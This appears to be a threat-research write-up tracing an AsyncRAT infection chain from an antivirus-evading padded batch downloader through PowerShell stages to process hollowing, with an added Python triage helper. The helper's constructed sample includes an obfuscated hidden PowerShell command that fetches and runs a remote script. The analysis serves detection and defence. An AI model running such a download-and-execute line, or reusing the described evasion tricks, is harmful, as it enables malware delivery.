Summary
AsyncRAT is an open-source remote administration tool released on GitHub in January 2019. It is designed to remotely control computers over an encrypted connection, giving the operator full control through functionality such as:
- View and record screen
- Keylogger
- Upload, download and execute files
- Chat communication
- Persistence mechanisms
- Disable Windows Defender
- Shutdown / Restart the machine
- DOS attack
Although the official GitHub repository contains a legal disclaimer, AsyncRAT is widely used by attackers and even by some APT groups. Netskope Threat Labs recently came across a FUD (Fully Undetected) Batch script that downloads AsyncRAT from an Amazon S3 bucket. At the time of our analysis, the Batch script was not detected by any of the antivirus engines on VirusTotal. The attacker used a few simple techniques to keep the script under the radar, which we describe later in this analysis.
The downloaded file (second stage) is a PowerShell script that creates and uses multiple files to execute AsyncRAT, which is injected into a legitimate process.
In this blog post, we will analyze the complete infection flow of AsyncRAT, from the FUD BAT downloader spotted by the MalwareHunterTeam to the last payload.
Stage 01 – FUD Downloader
The first stage is a batch script that had zero detections on VirusTotal.
Although no AV vendor detects the file, it triggers many Sigma and IDS rule matches, as well as detections by the sandboxes used by VirusTotal.
The lack of detection is likely due to a long string the attacker added to the file many times (more than 100).
The string is always the same and is written in Japanese; a rough translation suggests it is nonsense text added by the attacker as filler.
The malicious command itself is quite simple and sits among the nonsense strings. It is slightly obfuscated, which probably also contributes to the absence of detection.
The command downloads and executes the second stage via PowerShell from an Amazon S3 bucket.
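The padding technique described above suggests a simple triage step: lines that repeat dozens of times are filler, and whatever survives is the real command. The following Python helper is an added example, not code from the Netskope analysis; it works on a constructed batch sample (the real filler string and the real S3 URL are not reproduced here), and its caret-stripping step is an assumption, since the post does not say which obfuscation the sample used.

```python
import re
from collections import Counter

# Constructed sample (not the real script): one junk line repeated 200 times,
# with a single caret-split PowerShell download command hidden in the middle.
JUNK = "rem 意味のない文字列の埋め草"
SAMPLE_BAT = "\n".join(
    ["@echo off"]
    + [JUNK] * 150
    + ['po^wersh^ell -w hidden -c "iwr https://example-bucket.s3.amazonaws.com/s2.ps1 '
       '-OutFile %TEMP%\\s2.ps1; & %TEMP%\\s2.ps1"']
    + [JUNK] * 50
)

PADDING_THRESHOLD = 20  # any line repeated at least this often is treated as filler

# Indicators tied to this chain: hidden PowerShell fetching a second stage from S3.
INDICATORS = {
    "powershell": r"\bpowershell\b",
    "hidden_window": r"-w(indowstyle)?\s+hidden",
    "web_download": r"\b(iwr|invoke-webrequest|downloadstring|downloadfile)\b",
    "s3_bucket": r"s3\.amazonaws\.com",
}

def strip_padding(text, threshold=PADDING_THRESHOLD):
    """Drop lines that occur `threshold` or more times; keep the rest in order.
    Returns (kept_lines, number_of_padding_lines_removed)."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    counts = Counter(lines)
    kept = [ln for ln in lines if counts[ln] < threshold]
    return kept, len(lines) - len(kept)

def normalize(line):
    """Remove cmd.exe caret escapes (po^wer^shell) so keyword matching works.
    Assumption: the post does not state which obfuscation the real sample used."""
    return line.replace("^", "")

def triage(text):
    """Return a small report: surviving lines and which indicators each one hits."""
    kept, padding = strip_padding(text)
    findings = []
    for raw in kept:
        line = normalize(raw)
        hits = [name for name, pat in INDICATORS.items() if re.search(pat, line, re.I)]
        if hits:
            findings.append({"line": line, "indicators": hits})
    return {"padding_lines": padding, "candidate_lines": kept, "findings": findings}

if __name__ == "__main__":
    report = triage(SAMPLE_BAT)
    print(f"padding lines removed: {report['padding_lines']}")
    for f in report["findings"]:
        print(f"{f['indicators']}: {f['line']}")
```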
Stage 02 – PowerShell
The file downloaded from the Amazon S3 bucket is a PowerShell script. As shown in the diagram in the summary section, this script creates multiple files in order to execute the last stage.
First, it creates a folder named “Not” in “C:\ProgramData”.
Then, it creates five files in this directory. The primary goal of this stage is to run another PowerShell script through a chain of executions, described below:
- File “xx.vbs” is executed by the second stage;
- File “xx.vbs” executes file “xx.bat”;
- File “xx.bat” executes file “Bin.vbs” via scheduled task;
- File “Bin.vbs” executes file “Bin.bat”;
- And finally, “Bin.bat” executes “Bin.ps1” via PowerShell.
There are two PE files embedded in the last PowerShell script.
The first is known as “RunPE” and is used to inject AsyncRAT, which is the second PE file in the script, into a legitimate process.
The PowerShell script loads RunPE directly into memory, so neither PE file is written to disk.
Stage 03 – RunPE
This file is responsible for injecting AsyncRAT into another process using Process Hollowing. It is developed in .NET and protected with Confuser.
The PowerShell script from the second stage loads RunPE in memory and calls a method named “Execute” from “GIT.local”. The method receives as arguments the path of the targeted executable (“C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe”) and the AsyncRAT bytes.
After removing part of the obfuscation, we can confirm that AsyncRAT is being injected via Process Hollowing.